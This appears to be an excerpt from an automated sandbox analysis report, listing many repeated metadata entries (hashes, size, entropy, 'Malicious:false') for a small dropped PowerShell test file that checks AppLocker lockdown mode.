                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
